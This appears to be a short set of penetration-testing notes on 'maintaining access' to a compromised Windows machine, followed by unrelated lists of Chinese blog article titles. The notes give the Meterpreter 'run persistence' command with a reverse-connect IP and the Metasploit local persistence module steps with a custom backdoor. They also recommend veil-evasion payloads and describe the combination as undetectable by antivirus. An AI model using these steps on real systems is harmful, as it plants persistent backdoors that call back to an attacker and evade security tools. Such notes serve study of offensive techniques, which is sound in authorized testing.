MAINTAINING ACCESS - Methods

1. Using a veil-evasion

  • Rev_http_service
  • Rev_tcp_service
  • Use it instead of a normal backdoor.
  • Or upload and execute from meterpreter.
  • Does not always work.

2. Using persistence module

  • run persistence -h
  • Detectable by antivirus programs.

run persistence -U -i  -p  -r 10.0.0.43

3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus

  • > use exploit/windows/local/persistence

  • > set session [session id]

  • > set exe::custom[backdoor location]

  • >exploit

最新文章

  1. Arguments Optional
  2. CSS伪类选择器
  3. @@IDENTITY与SCOPE_IDENTITY()
  4. iOS - OC NSEnumerator 迭代器
  5. SharePoint表单和工作流 - Nintex篇(二)
  6. linux install mpi4py
  7. 大陆 Google play 开发者注册(2016)
  8. QFtp类参考
  9. 编译安装GCC 5.2.0
  10. Android JNI环境要SQLite加密模块简介
  11. MyDAL - .UpdateAsync() 之 .Set() 使用
  12. Vuejs——(8)Vuejs组件的定义
  13. 组件 --BreadCrumb--面包屑
  14. Mac下使用Fiddler(转载园友小坦克)
  15. 图解Oracle下建立tnsname
  16. Spark官方3 ---------Spark Streaming编程指南(1.5.0)
  17. (转)Mac os x 下配置Intellij IDEA + Tomcat 出现权限问题的解决办法
  18. 文本数据预处理:sklearn 中 CountVectorizer、TfidfTransformer 和 TfidfVectorizer
  19. Win10 恢复后退键
  20. UICamera

热门文章

  1. Golang实现数的几种遍历
  2. 01 . ELK Stack简介原理及部署应用
  3. 说说TCP的三次握手和四次挥手
  4. java读写Excel模板文件,应用于负载均衡多个服务器
  5. Object.defineProperty()更改对象中的函数
  6. VMware 15安装Ubuntu 16.04并配置环境
  7. 暑假集训Day2 互不侵犯(状压dp)
  8. Illegal reflective access by org.apache.hadoop.security.authentication.util.KerberosUtil
  9. 01 . Shell详细入门介绍及简单应用
  10. 你知道Redis可以实现延迟队列吗?